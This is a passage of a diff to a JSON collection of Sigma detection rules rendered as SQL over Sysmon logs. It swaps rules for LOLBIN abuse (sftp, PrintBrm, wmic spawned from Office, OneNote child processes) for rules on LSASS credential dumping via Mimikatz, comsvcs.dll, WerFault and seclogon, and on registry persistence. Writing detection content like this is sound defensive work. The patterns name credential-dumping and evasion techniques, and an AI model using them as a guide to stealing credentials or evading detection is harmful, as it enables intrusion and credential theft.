'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Use Of The SFTP.EXE Binary As A LOLBIN", - "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", - "status": "experimental", - "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "status": "test", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_lolbin_sftp.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Use of VisualUiaVerifyNative.exe", - "id": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", - "status": "experimental", - "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "status": "test", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Legitimate testing of Microsoft UI parts." + "Unlikely, since these tools shouldn't access lsass.exe at all" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VisualUiaVerifyNative.exe' ESCAPE '\\' OR OriginalFileName = 'VisualUiaVerifyNative.exe'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1047", + "attack.t1003.001", + "attack.t1059.001", "attack.lateral_movement", - "attack.t1021.003" + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", "attack.execution", - "attack.defense_evasion" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", - "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Other parent processes other than notepad++ using GUP that are not currently identified" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wab.exe' ESCAPE '\\' OR Image LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "PUA - Sysinternal Tool Execution - Registry", + "id": "25ffa65d-76d8-4da5-a832-3f2b0136e133", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "description": "Detects the execution of a Sysinternals Tool via the creation of the \"accepteula\" registry key", + "author": "Markus Neis", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_add_pua_sysinternals_execution_via_eula.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", - "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "status": "test", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious Rundll32 Setupapi.dll Activity", - "id": "285b85b1-a555-4095-8652-a8a4106af63f", - "status": "test", - "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", - "author": "Konstantin Grishchenko, oscd.community", + "title": "PUA - Sysinternals Tools Execution - Registry", + "id": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "status": "experimental", + "description": "Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the \"accepteula\" registry key.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" + "Legitimate use of SysInternals tools. Filter the legitimate paths used in your environnement" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sysinternals%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" + "filename": "registry_add_pua_sysinternals_susp_execution_via_eula.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE 